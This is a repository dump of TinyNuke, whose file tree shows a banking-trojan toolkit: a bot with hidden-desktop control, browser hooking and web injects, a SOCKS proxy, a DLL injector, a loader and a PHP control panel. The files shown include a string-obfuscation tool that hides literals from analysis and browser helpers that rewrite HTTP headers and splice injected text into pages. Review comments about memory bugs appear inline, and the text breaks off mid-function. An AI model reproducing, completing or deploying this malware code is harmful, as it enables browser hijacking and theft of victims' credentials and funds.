├── .gitattributes ├── .gitignore ├── .vs └── TinyNuke │ └── v14 │ └── .suo ├── AiJson ├── AiJson.cpp ├── AiJson.h ├── AiList.cpp ├── AiList.h ├── AiStrAppender.cpp └── AiStrAppender.h ├── Api.cpp ├── Api.h ├── AutoEncrypt.exe ├── AutoEncrypt ├── AutoEncrypt.sln ├── AutoEncrypt.v11.suo └── AutoEncrypt │ ├── App.config │ ├── AutoEncrypt.csproj │ ├── AutoEncrypt.csproj.user │ ├── Program.cs │ └── Properties │ └── AssemblyInfo.cs ├── Bot ├── Bot.cpp ├── Bot.h ├── Bot.vcxproj ├── Bot.vcxproj.filters ├── Bot.vcxproj.user ├── BrowserUtils.cpp ├── BrowserUtils.h ├── Explorer.cpp ├── Explorer.h ├── FirefoxChrome.cpp ├── FirefoxChrome.h ├── HiddenDesktop.cpp ├── HiddenDesktop.h ├── IE.cpp ├── IE.h ├── Main.cpp ├── Socks.cpp ├── Socks.h ├── WebInjects.cpp └── WebInjects.h ├── Common.h ├── CreateDllInjectPayload └── CreateDllInjectPayload.cpp ├── HTTP.cpp ├── HTTP.h ├── HiddenDesktop ├── HiddenDesktop.sdf ├── HiddenDesktop.sln ├── HiddenDesktop.v11.suo ├── Server │ ├── Common.h │ ├── ControlWindow.cpp │ ├── ControlWindow.h │ ├── Main.cpp │ ├── Server.cpp │ ├── Server.h │ ├── Server.vcxproj │ ├── Server.vcxproj.filters │ └── Server.vcxproj.user └── readme.txt ├── Inject.cpp ├── Inject.h ├── Loader ├── Loader.vcxproj ├── Loader.vcxproj.filters ├── Loader.vcxproj.user └── Main.cpp ├── MinHook ├── include │ └── MinHook.h └── src │ ├── buffer.c │ ├── buffer.h │ ├── hde │ ├── hde32.c │ ├── hde32.h │ ├── hde64.c │ ├── hde64.h │ ├── pstdint.h │ ├── table32.h │ └── table64.h │ ├── hook.c │ ├── trampoline.c │ └── trampoline.h ├── Panel.cpp ├── Panel.h ├── README.md ├── SocksServer ├── SocksServer.sdf ├── SocksServer.sln ├── SocksServer.v11.suo └── SocksServer │ ├── Server.cpp │ ├── Server.h │ ├── SocksServer.vcxproj │ ├── SocksServer.vcxproj.filters │ ├── SocksServer.vcxproj.user │ └── main.cpp ├── TinyNuke.VC.db ├── TinyNuke.sdf ├── TinyNuke.sln ├── TinyNuke.v11.suo ├── Utils.cpp ├── Utils.h ├── enc.cmd ├── panel ├── bots.php ├── client.php ├── commands.php ├── db.sql ├── geoip.dat 
├── inc │ ├── cc.php │ ├── common.php │ ├── const.php │ ├── db.php │ ├── geoip.php │ ├── ui.php │ └── utils.php ├── index.php ├── login.php ├── pinned_hosts.php ├── private │ ├── .htaccess │ └── injects.json ├── reports.php ├── settings.php ├── settings_data.php └── style │ └── style.css └── wow64ext ├── CMemPtr.h ├── internal.h ├── resource.h ├── wow64ext.cpp ├── wow64ext.dll ├── wow64ext.h └── wow64ext.lib /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | 4 | # Custom for Visual Studio 5 | *.cs diff=csharp 6 | 7 | # Standard to msysgit 8 | *.doc diff=astextplain 9 | *.DOC diff=astextplain 10 | *.docx diff=astextplain 11 | *.DOCX diff=astextplain 12 | *.dot diff=astextplain 13 | *.DOT diff=astextplain 14 | *.pdf diff=astextplain 15 | *.PDF diff=astextplain 16 | *.rtf diff=astextplain 17 | *.RTF diff=astextplain 18 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Windows image file caches 2 | Thumbs.db 3 | ehthumbs.db 4 | 5 | # Folder config file 6 | Desktop.ini 7 | 8 | # Recycle Bin used on file shares 9 | $RECYCLE.BIN/ 10 | 11 | # Windows Installer files 12 | *.cab 13 | *.msi 14 | *.msm 15 | *.msp 16 | 17 | # Windows shortcuts 18 | *.lnk 19 | 20 | # ========================= 21 | # Operating System Files 22 | # ========================= 23 | 24 | # OSX 25 | # ========================= 26 | 27 | .DS_Store 28 | .AppleDouble 29 | .LSOverride 30 | 31 | # Thumbnails 32 | ._* 33 | 34 | # Files that might appear in the root of a volume 35 | .DocumentRevisions-V100 36 | .fseventsd 37 | .Spotlight-V100 38 | .TemporaryItems 39 | .Trashes 40 | .VolumeIcon.icns 41 | 42 | # Directories potentially created on remote AFP share 43 | .AppleDB 44 | .AppleDesktop 45 | Network Trash Folder 46 | Temporary Items 47 | .apdisk 48 | 
-------------------------------------------------------------------------------- /.vs/TinyNuke/v14/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rossja/TinyNuke/c1e04c36d3aa2dbd70fcb17063809798b00b1fcf/.vs/TinyNuke/v14/.suo -------------------------------------------------------------------------------- /AiJson/AiJson.h: -------------------------------------------------------------------------------- 1 | #ifndef AI_JSON_H 2 | #define AI_JSON_H 3 | 4 | #include "AiList.h" 5 | 6 | typedef struct AiJsonObjectField AiJsonObjectField; 7 | typedef struct AiJsonValue AiJsonValue; 8 | typedef struct AiJsonArray AiJsonArray; 9 | typedef struct AiJson AiJson; 10 | typedef enum AiJsonType AiJsonType; 11 | typedef enum AiJsonError AiJsonError; 12 | 13 | enum AiJsonType 14 | { 15 | AI_JSON_STRING, 16 | AI_JSON_DOUBLE, 17 | AI_JSON_ULONG, 18 | AI_JSON_SLONG, 19 | AI_JSON_OBJECT, 20 | AI_JSON_ARRAY, 21 | AI_JSON_BOOL, 22 | AI_JSON_NULL 23 | }; 24 | 25 | //do not reorder 26 | enum AiJsonError 27 | { 28 | AI_JSON_E_OK, 29 | AI_JSON_E_UNEXPECTED_SYMBOL, 30 | AI_JSON_E_UNEXPECTED_EOF, 31 | AI_JSON_E_INVALID_HEX_DIGIT, 32 | AI_JSON_E_INVALID_ESCAPE_SEQUENCE, 33 | AI_JSON_E_CHAR_MUST_BE_ESCAPED, 34 | AI_JSON_E_INVALID_NUM, 35 | AI_JSON_E_EXPECTED_ARRAY_CLOSE, 36 | AI_JSON_E_EXPECTED_NAME, 37 | AI_JSON_E_EXPECTED_NAME_SEPARATOR, 38 | AI_JSON_E_EXPECTED_OBJECT_CLOSE, 39 | AI_JSON_E_UNKNOWN, 40 | AI_JSON_E_ALLOC, 41 | AI_JSON_E_INVALID_VALUE, 42 | }; 43 | 44 | struct AiJsonValue 45 | { 46 | AiJsonType type; 47 | union 48 | { 49 | char *string; 50 | long sLong; 51 | unsigned long uLong; 52 | double dbl; 53 | AiList *array; 54 | AiList *object; 55 | int boolean; 56 | } data; 57 | }; 58 | 59 | struct AiJsonObjectField 60 | { 61 | char *name; 62 | AiJsonValue value; 63 | }; 64 | 65 | struct AiJson 66 | { 67 | AiJsonValue root; 68 | AiJsonError error; 69 | char *errorMsg; 70 | size_t line; 71 | size_t column; 72 | 
struct 73 | { 74 | AiList *mallocList; 75 | AiList *listList; 76 | } _private; 77 | }; 78 | 79 | AiJson *AiJsonParse(char *str); 80 | void AiJsonDestroy(AiJson *json); 81 | char *AiJsonDump(AiJson *json, int spaces); 82 | 83 | AiJsonValue *AiJsonGetValueObject(AiList *object, char *name); 84 | void AiJsonRemoveValueObject(AiList *object, char *name); 85 | int AiJsonInsertValueObject(AiJson *json, AiList *object, char *name, AiJsonValue *value); 86 | 87 | AiJsonValue *AiJsonGetValueArray(AiList *array, size_t index); 88 | void AiJsonRemoveValueArray(AiList *array, size_t index); 89 | int AiJsonInsertValueArray(AiJson *json, AiList *array, AiJsonValue *value); 90 | 91 | #endif -------------------------------------------------------------------------------- /AiJson/AiList.cpp: -------------------------------------------------------------------------------- 1 | #include "..\Common.h" 2 | #include 3 | #include 4 | #include 5 | #include "AiList.h" 6 | 7 | /* Allocates a zero-filled AiList through the project's Alloc wrapper; returns 0 when the allocation fails. */ AiList *AiListCreate() 8 | { 9 | AiList *list = (AiList *) Alloc(sizeof(*list)); 10 | if(!list) 11 | return 0; 12 | Funcs::pMemset(list, 0, sizeof(*list)); 13 | return list; 14 | } 15 | 16 | /* Appends data as a new tail node. Returns 1 on success, 0 if list is NULL or the node allocation fails. Only the data pointer is stored; nothing here copies it. */ int AiListInsert(AiList *list, void *data) 17 | { 18 | AiListNode *node; 19 | if(!list) 20 | return 0; 21 | node = (AiListNode *) Alloc(sizeof(*node)); 22 | if(!node) 23 | return 0; 24 | Funcs::pMemset(node, 0, sizeof(*node)); 25 | node->data = data; 26 | if(!list->first) 27 | { 28 | list->first = node; 29 | list->last = node; 30 | } 31 | else 32 | { 33 | list->last->next = node; 34 | node->prev = list->last; 35 | list->last = node; 36 | } 37 | ++list->len; 38 | return 1; 39 | } 40 | 41 | /* Unlinks node from list and frees the node (node->data is not freed here). NOTE(review): list->first is never updated in this function, and list->last is only updated when node->prev is non-NULL, so removing the head or the only element appears to leave list->first (and, for a single element, list->last) pointing at freed memory. */ void AiListRemove(AiList *list, AiListNode *node) 42 | { 43 | if(!list) 44 | return; 45 | if(!node) 46 | return; 47 | if(node->prev) 48 | { 49 | node->prev->next = node->next; 50 | if(list->last == node) 51 | list->last = list->last->prev; 52 | } 53 | if(node->next) 54 | node->next->prev = node->prev; 55 | Funcs::pFree(node); 56 | --list->len; 57 | 
} 58 | 59 | /* Frees every node and then the list itself; node data is not freed. NOTE(review): list->first is read in the initializer before the NULL check that follows, so that check cannot protect a NULL list; the final list = 0 only changes the local parameter. */ void AiListDestroy(AiList *list) 60 | { 61 | AiListNode *curr = list->first; 62 | if(!list) 63 | return; 64 | while(curr) 65 | { 66 | AiListNode *kill = curr; 67 | curr = curr->next; 68 | Funcs::pFree(kill); 69 | } 70 | Funcs::pFree(list); 71 | list = 0; 72 | } -------------------------------------------------------------------------------- /AiJson/AiList.h: -------------------------------------------------------------------------------- 1 | #ifndef AI_LIST_H 2 | #define AI_LIST_H 3 | 4 | #include 5 | 6 | typedef struct AiList AiList; 7 | typedef struct AiListNode AiListNode; 8 | 9 | struct AiList 10 | { 11 | AiListNode *first; 12 | AiListNode *last; 13 | size_t len; 14 | }; 15 | 16 | struct AiListNode 17 | { 18 | AiListNode *prev; 19 | AiListNode *next; 20 | void *data; 21 | }; 22 | 23 | AiList *AiListCreate(); 24 | int AiListInsert(AiList *list, void *data); 25 | void AiListRemove(AiList *list, AiListNode *node); 26 | void AiListDestroy(AiList *list); 27 | 28 | #endif -------------------------------------------------------------------------------- /AiJson/AiStrAppender.cpp: -------------------------------------------------------------------------------- 1 | #ifdef _MSC_VER 2 | #define _CRT_SECURE_NO_WARNINGS 3 | #endif 4 | 5 | #include "..\Common.h" 6 | #include 7 | #include 8 | #include 9 | #include "AiStrAppender.h" 10 | 11 | #define STR_GROW_SIZE 512 12 | 13 | /* Starts an appender with a buffer of STR_GROW_SIZE + 1 bytes holding an empty string; returns 1 on success and 0 on failure. NOTE(review): the terminator is written through str before the allocation result is tested, so the later !str check comes too late. */ int AiStrAppenderInit(AiStrAppender *strAppender) 14 | { 15 | if(!strAppender) 16 | return 0; 17 | strAppender->allocSize = STR_GROW_SIZE; 18 | strAppender->strSize = 0; 19 | strAppender->str = (char *) Alloc(strAppender->allocSize + 1); 20 | *strAppender->str = 0; 21 | if(!strAppender->str) 22 | return 0; 23 | return 1; 24 | } 25 | 26 | /* Appends a single character by wrapping it in a 2-byte NUL-terminated string and passing it to AiStrAppenderWork. */ int AiStrAppenderWorkChar(AiStrAppender *strAppender, char toAppend) 27 | { 28 | char str[2]; 29 | str[0] = toAppend; 30 | str[1] = 0; 31 | return AiStrAppenderWork(strAppender, str); 32 | } 33 | 34 | int AiStrAppenderWork(AiStrAppender *strAppender, char 
*toAppend) 35 | { 36 | size_t toAppendSize = Funcs::pLstrlenA(toAppend); 37 | if(toAppendSize == 0) 38 | return 1; 39 | if(!strAppender || !toAppend) 40 | return 0; 41 | strAppender->strSize += toAppendSize; 42 | if(strAppender->strSize > strAppender->allocSize) 43 | { 44 | void *mem; 45 | strAppender->allocSize += STR_GROW_SIZE; 46 | mem = ReAlloc(strAppender->str, strAppender->allocSize + 1); 47 | if(!mem) 48 | return 0; 49 | strAppender->str = (char *) mem; 50 | } 51 | Funcs::pLstrcatA(strAppender->str, toAppend); 52 | return 1; 53 | } -------------------------------------------------------------------------------- /AiJson/AiStrAppender.h: -------------------------------------------------------------------------------- 1 | #ifndef AI_STR_APPENDER 2 | #define AI_LIST_APPENDER 3 | 4 | #include 5 | 6 | typedef struct AiStrAppender AiStrAppender; 7 | 8 | struct AiStrAppender 9 | { 10 | char *str; 11 | size_t strSize; 12 | size_t allocSize; 13 | }; 14 | 15 | int AiStrAppenderInit(AiStrAppender *strAppender); 16 | int AiStrAppenderWork(AiStrAppender *strAppender, char *toAppend); 17 | int AiStrAppenderWorkChar(AiStrAppender *strAppender, char toAppend); 18 | 19 | #endif -------------------------------------------------------------------------------- /AutoEncrypt.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rossja/TinyNuke/c1e04c36d3aa2dbd70fcb17063809798b00b1fcf/AutoEncrypt.exe -------------------------------------------------------------------------------- /AutoEncrypt/AutoEncrypt.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "AutoEncrypt", "AutoEncrypt\AutoEncrypt.csproj", "{864F1D11-1809-4054-B8D0-1FBB51BD2BA1}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | 
Debug|Any CPU = Debug|Any CPU 9 | Release|Any CPU = Release|Any CPU 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {864F1D11-1809-4054-B8D0-1FBB51BD2BA1}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 13 | {864F1D11-1809-4054-B8D0-1FBB51BD2BA1}.Debug|Any CPU.Build.0 = Debug|Any CPU 14 | {864F1D11-1809-4054-B8D0-1FBB51BD2BA1}.Release|Any CPU.ActiveCfg = Release|Any CPU 15 | {864F1D11-1809-4054-B8D0-1FBB51BD2BA1}.Release|Any CPU.Build.0 = Release|Any CPU 16 | EndGlobalSection 17 | GlobalSection(SolutionProperties) = preSolution 18 | HideSolutionNode = FALSE 19 | EndGlobalSection 20 | EndGlobal 21 | -------------------------------------------------------------------------------- /AutoEncrypt/AutoEncrypt.v11.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rossja/TinyNuke/c1e04c36d3aa2dbd70fcb17063809798b00b1fcf/AutoEncrypt/AutoEncrypt.v11.suo -------------------------------------------------------------------------------- /AutoEncrypt/AutoEncrypt/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /AutoEncrypt/AutoEncrypt/AutoEncrypt.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {864F1D11-1809-4054-B8D0-1FBB51BD2BA1} 8 | Exe 9 | Properties 10 | AutoEncrypt 11 | AutoEncrypt 12 | v4.5 13 | 512 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 59 | -------------------------------------------------------------------------------- /AutoEncrypt/AutoEncrypt/AutoEncrypt.csproj.user: 
-------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | C:\Users\User\Documents\test.txt 5 | 6 | -------------------------------------------------------------------------------- /AutoEncrypt/AutoEncrypt/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.IO; 4 | using System.Linq; 5 | using System.Text; 6 | using System.Threading.Tasks; 7 | 8 | namespace AutoEncrypt 9 | { 10 | class Program 11 | { 12 | private static String EncStr(String str, String key) 13 | { 14 | String enc = ""; 15 | for(int i = 0; i < str.Length; ++i) 16 | { 17 | int code = str[i] ^ key[i % key.Length]; 18 | enc += "\\x" + code.ToString("X4"); 19 | } 20 | return enc; 21 | } 22 | 23 | private static Random random = new Random(); 24 | private static string RandomString(int length) 25 | { 26 | const string chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; 27 | return new string(Enumerable.Repeat(chars, length) 28 | .Select(s => s[random.Next(s.Length)]).ToArray()); 29 | } 30 | 31 | static void Main(string[] args) 32 | { 33 | try 34 | { 35 | const String startEncA = "ENC_STR_A"; 36 | const String endEnc = "END_ENC_STR"; 37 | const int maxKeyLen = 128; 38 | String source = File.ReadAllText(args[0]); 39 | File.WriteAllText(args[0], ""); 40 | StreamWriter writer = File.AppendText(args[0]); 41 | for(;;) 42 | { 43 | int indexStart; 44 | if((indexStart = source.IndexOf(startEncA)) == -1) 45 | break; 46 | 47 | writer.Write(source.Substring(0, indexStart)); 48 | 49 | int indexEnd; 50 | if((indexEnd = source.IndexOf(endEnc)) == -1) 51 | break; 52 | 53 | String str2enc = source.Substring(indexStart + startEncA.Length + 1, indexEnd - indexStart - endEnc.Length); 54 | Console.WriteLine(str2enc); 55 | 56 | str2enc = System.Text.RegularExpressions.Regex.Unescape(str2enc); 57 | int len = str2enc.Length; 58 | 59 | source = source.Substring(indexEnd + 
endEnc.Length); 60 | 61 | String key = RandomString((str2enc.Length < maxKeyLen) ? str2enc.Length : maxKeyLen); 62 | str2enc = EncStr(str2enc, key); 63 | 64 | writer.Write("UnEnc(\"" + str2enc + "\", \"" + key + "\", " + len + ")"); 65 | } 66 | writer.Write(source); 67 | writer.Close(); 68 | } 69 | catch(Exception e) 70 | { 71 | Console.WriteLine(e.ToString()); 72 | } 73 | Console.ReadKey(); 74 | } 75 | } 76 | } -------------------------------------------------------------------------------- /AutoEncrypt/AutoEncrypt/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("AutoEncrypt")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("Microsoft")] 12 | [assembly: AssemblyProduct("AutoEncrypt")] 13 | [assembly: AssemblyCopyright("Copyright © Microsoft 2016")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 
20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("e736e834-adb0-484e-ba3b-0aade648dd30")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Bot/Bot.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "..\Common.h" 3 | void StartBot(); -------------------------------------------------------------------------------- /Bot/Bot.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {02973c9f-658a-4cd8-b6a3-ff57a4a50778} 18 | 19 | 20 | {080297bb-d59c-4cb0-ad15-943361adca8a} 21 | 22 | 23 | {233dee48-2e2c-4291-b51f-b42b5c9adfbd} 24 | 25 | 26 | {2e345b9a-fd26-4f80-ba3d-ba790eea1a07} 27 | 28 | 29 | {87621f0f-b199-4ead-af5b-19ff85b463b3} 30 | 31 | 32 | {f210c39b-ed90-4936-89d9-52c86de3cd15} 33 | 34 | 35 | 36 | 37 | Source Files 38 | 39 | 40 | Source Files 41 | 42 | 43 | Source Files 44 | 45 | 46 | Source Files 47 | 48 | 49 | Source Files 50 | 51 | 52 | Source Files\wow64ext 53 | 54 | 55 | Source Files 56 | 57 | 58 | Source Files\MinHook 59 | 60 | 61 | 
Source Files\MinHook 62 | 63 | 64 | Source Files\MinHook 65 | 66 | 67 | Source Files\MinHook 68 | 69 | 70 | Source Files\MinHook 71 | 72 | 73 | Source Files 74 | 75 | 76 | Source Files 77 | 78 | 79 | Source Files 80 | 81 | 82 | Source Files 83 | 84 | 85 | Source Files 86 | 87 | 88 | Source Files\AiJson 89 | 90 | 91 | Source Files\AiJson 92 | 93 | 94 | Source Files\AiJson 95 | 96 | 97 | Source Files 98 | 99 | 100 | Source Files 101 | 102 | 103 | Source Files 104 | 105 | 106 | 107 | 108 | Header Files 109 | 110 | 111 | Header Files 112 | 113 | 114 | Header Files 115 | 116 | 117 | Header Files 118 | 119 | 120 | Header Files 121 | 122 | 123 | Header Files 124 | 125 | 126 | Header Files\wow64ext 127 | 128 | 129 | Header Files\wow64ext 130 | 131 | 132 | Header Files\wow64ext 133 | 134 | 135 | Header Files\wow64ext 136 | 137 | 138 | Header Files 139 | 140 | 141 | Header Files\MinHook 142 | 143 | 144 | Header Files\MinHook 145 | 146 | 147 | Header Files\MinHook 148 | 149 | 150 | Header Files\MinHook 151 | 152 | 153 | Header Files\MinHook 154 | 155 | 156 | Header Files\MinHook 157 | 158 | 159 | Header Files\MinHook 160 | 161 | 162 | Header Files\MinHook 163 | 164 | 165 | Header Files 166 | 167 | 168 | Header Files 169 | 170 | 171 | Header Files 172 | 173 | 174 | Header Files 175 | 176 | 177 | Header Files 178 | 179 | 180 | Header Files 181 | 182 | 183 | Header Files\AiJson 184 | 185 | 186 | Header Files\AiJson 187 | 188 | 189 | Header Files\AiJson 190 | 191 | 192 | Header Files 193 | 194 | 195 | -------------------------------------------------------------------------------- /Bot/Bot.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /Bot/BrowserUtils.cpp: -------------------------------------------------------------------------------- 1 | #include "BrowserUtils.h" 2 | #include "..\Panel.h" 3 | #include "WebInjects.h" 4 | 5 | char 
*FindStrSandwich(char *buf, char *leftPart, char *rightPart) 6 | { /* Returns a newly allocated copy of the text in buf between the first match of leftPart and the next match of rightPart (matching via Funcs::pStrStrIA, presumably the case-insensitive StrStrIA), or NULL if either part is missing. Callers in this file free the result. NOTE(review): the Alloc result is written to without a NULL check. */ 7 | char *startStrPos = Funcs::pStrStrIA(buf, leftPart); 8 | if(!startStrPos) 9 | return NULL; 10 | startStrPos += Funcs::pLstrlenA(leftPart); 11 | char *endStrPos = Funcs::pStrStrIA(startStrPos, rightPart); 12 | if(!endStrPos) 13 | return NULL; 14 | DWORD strSize = endStrPos - startStrPos; 15 | char *str = (char *) Alloc(strSize + 1); 16 | str[strSize] = 0; 17 | Funcs::pMemcpy(str, startStrPos, strSize); 18 | return str; 19 | } 20 | 21 | /* Lower-cases c when toLower is set, otherwise returns it unchanged. */ char ToLowerOrIgnore(char c, BOOL toLower) 22 | { 23 | return toLower ? Funcs::pTolower(c) : c; 24 | } 25 | 26 | /* Bounded string compare over maxCount characters, case-insensitive when ignoreCase is set; 0 means equal. NOTE(review): the comparison result (presumably an int) is narrowed to char. */ char StrNcmpOrI(const char *str, const char* str2, DWORD maxCount, BOOL ignoreCase) 27 | { 28 | if(ignoreCase) 29 | return Funcs::pStrnicmp(str, str2, maxCount); 30 | else 31 | return Funcs::pStrncmp(str, str2, maxCount); 32 | } 33 | 34 | DWORD WildCardStrCmp(char *str, char *str2, BOOL ignoreCase, BOOL checkEnd) 35 | { /* Matches str2 against the pattern str, in which '*' stands for any run of characters. Returns the number of str2 characters consumed on a match and FALSE (0) otherwise, so a match that consumes nothing cannot be told apart from a failure. With checkEnd set, all of str2 must be consumed; a pattern ending in '*' returns the full length of str2. */ 36 | if(!str || !str2) 37 | return FALSE; 38 | 39 | const char wildCardChar = '*'; 40 | 41 | DWORD strLen = Funcs::pLstrlenA(str); 42 | DWORD str2Len = Funcs::pLstrlenA(str2); 43 | 44 | BOOL wildCard = FALSE; 45 | BOOL matched = TRUE; 46 | 47 | PCHAR strAfterWildCard = 0; 48 | DWORD strAfterWildCardLen; 49 | 50 | DWORD i2 = 0; 51 | for(DWORD i = 0; i < strLen || wildCard;) 52 | { 53 | if(wildCard) 54 | { /* after a '*': slide forward in str2 until the literal text that follows the wildcard is found */ 55 | if(i2 == str2Len) 56 | return FALSE; 57 | if(!StrNcmpOrI(str2 + i2, strAfterWildCard, strAfterWildCardLen, ignoreCase)) 58 | { 59 | wildCard = FALSE; 60 | matched = TRUE; 61 | i2 += strAfterWildCardLen; 62 | } 63 | else 64 | ++i2; 65 | } 66 | else 67 | { 68 | if(str[i] == wildCardChar) 69 | { 70 | if(i + 1 == strLen) 71 | return str2Len; 72 | 73 | /* the literal segment after this '*' runs to the next '*' or to the end of the pattern */ char *nextWildCard = Funcs::pStrChrA((char *) str + i + 1, wildCardChar); 74 | if(!nextWildCard) 75 | { 76 | strAfterWildCard = (char *) str + i + 1; 77 | strAfterWildCardLen = strLen - i - 1; 78 | } 79 | else 80 | { 81 | strAfterWildCard = (char *) str + i + 1; 82 | strAfterWildCardLen = 
(nextWildCard - str) - i - 1; 83 | } 84 | i += strAfterWildCardLen + 1; 85 | wildCard = TRUE; 86 | matched = FALSE; 87 | } 88 | else 89 | { 90 | if(ToLowerOrIgnore(str[i], ignoreCase) != ToLowerOrIgnore(str2[i2], ignoreCase)) 91 | return FALSE; 92 | ++i; 93 | ++i2; 94 | } 95 | } 96 | } 97 | if(i2 != str2Len && checkEnd) 98 | return FALSE; 99 | 100 | return matched ? i2 : FALSE; 101 | } 102 | 103 | DWORD WildCardStrStr(char *str, char *subStr, char **start) 104 | { /* Scans str for the first offset at which the pattern subStr matches (case-insensitive, not anchored at the end). On success stores that position in *start and returns the matched length; otherwise returns FALSE and leaves *start untouched. */ 105 | if(!str || !subStr) 106 | return FALSE; 107 | 108 | DWORD strLen = Funcs::pLstrlenA(str); 109 | for(DWORD i = 0; i < strLen; ++i) 110 | { 111 | DWORD len = WildCardStrCmp(subStr, str + i, TRUE, FALSE); 112 | if(len) 113 | { 114 | *start = str + i; 115 | return len; 116 | } 117 | } 118 | return FALSE; 119 | } 120 | 121 | BOOL ReplaceHeader(char **headers, char *name, char *value) 122 | { /* Rebuilds *headers in a new buffer so that header `name` carries `value`. A search pattern is formatted from Strs::bu1 (value not shown in this file) and name; if it matches, the matched text after its first two bytes is replaced, otherwise the new header is written over the last two bytes of the block followed by Strs::headersEnd. The old buffer is freed and *headers is repointed. NOTE(review): subStr is a 255-byte stack buffer filled by pWsprintfA with no length check on name visible here; *headers itself is not NULL-checked; headersSize - 2 assumes the block is at least two bytes long. */ 123 | if(!name || !value || !headers) 124 | return FALSE; 125 | char subStr[255] = { 0 }; 126 | Funcs::pWsprintfA(subStr, Strs::bu1, name); 127 | DWORD headersSize = Funcs::pLstrlenA(*headers); 128 | DWORD valueSize = Funcs::pLstrlenA(value); 129 | DWORD nameSize = Funcs::pLstrlenA(name); 130 | char *start; 131 | DWORD size = WildCardStrStr(*headers, subStr, &start); 132 | DWORD allocatedSize = headersSize + valueSize + nameSize + 10; 133 | 134 | char *newHeaders = (char *) Alloc(allocatedSize); 135 | if(!newHeaders) 136 | return FALSE; 137 | Funcs::pMemset(newHeaders, 0, allocatedSize); 138 | DWORD offset; 139 | DWORD beforeHeaderPosSize; 140 | if(size) 141 | { 142 | size -= 2; 143 | start += 2; 144 | beforeHeaderPosSize = start - *headers; 145 | offset = beforeHeaderPosSize; 146 | Funcs::pMemcpy(newHeaders, *headers, offset); 147 | } 148 | else 149 | { 150 | offset = headersSize - 2; 151 | Funcs::pMemcpy(newHeaders, *headers, offset); 152 | } 153 | Funcs::pMemcpy(newHeaders + offset, name, nameSize); 154 | offset += nameSize; 155 | Funcs::pMemcpy(newHeaders + offset, Strs::bu2, 2); 156 | offset += 2; 157 | 
Funcs::pMemcpy(newHeaders + offset, value, valueSize); 158 | offset += valueSize; 159 | if(size) 160 | { 161 | Funcs::pMemcpy(newHeaders + offset, Strs::winNewLine, 2); 162 | offset += 2; 163 | Funcs::pMemcpy(newHeaders + offset, *headers + beforeHeaderPosSize + size, headersSize - beforeHeaderPosSize - size); 164 | } 165 | else 166 | Funcs::pMemcpy(newHeaders + offset, Strs::headersEnd, 4); 167 | Funcs::pFree(*headers); 168 | *headers = newHeaders; 169 | return TRUE; 170 | } 171 | 172 | BOOL ReplaceBeforeAfter(char **str2replace, char *strBeforeAfter, char *strReplaceBefore, char *strReplaceAfter) 173 | { /* Finds the first wildcard match of strBeforeAfter in *str2replace and rebuilds the string with strReplaceBefore inserted in front of the match and strReplaceAfter behind it; the old buffer is freed and *str2replace is repointed. Returns FALSE when an argument is missing, nothing matches, or allocation fails. Callers are not in this file; presumably this is the splice primitive used by the web-inject code. NOTE(review): str2replace itself is dereferenced without a NULL check. */ 174 | if (!*str2replace || !strBeforeAfter 